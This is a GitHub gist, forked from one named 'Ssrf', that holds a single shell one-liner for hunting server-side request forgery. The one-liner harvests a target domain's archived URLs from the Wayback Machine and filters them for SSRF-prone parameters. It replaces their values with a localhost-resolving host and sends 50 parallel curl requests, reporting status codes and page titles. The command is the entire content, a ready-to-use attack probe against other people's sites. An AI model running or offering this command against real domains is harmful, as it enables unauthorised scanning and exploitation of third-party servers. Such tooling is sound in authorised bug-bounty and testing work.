Skip to content

Instantly share code, notes, and snippets.

@KathanP19
Forked from pikpikcu/Ssrf
Created November 24, 2020 15:24
Show Gist options
  • Save KathanP19/d4481760dbc11bd23c42e60bc8084d84 to your computer and use it in GitHub Desktop.
Save KathanP19/d4481760dbc11bd23c42e60bc8084d84 to your computer and use it in GitHub Desktop.
curl -s "http://web.archive.org/cdx/search/cdx?url=*.domain/*&output=txt&fl=original&collapse=urlkey&page=/" | gf ssrf | qsreplace "https://localtest.me" | parallel -j50 -q curl -i -s -k -o >(grep -io "<title>[^<]*" | cut -d'>' -f2-) --silent --max-time 2 --write-out 'Status:%{http_code}\t Header-size:%{size_header}tUrl:%{url_effective} || '
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment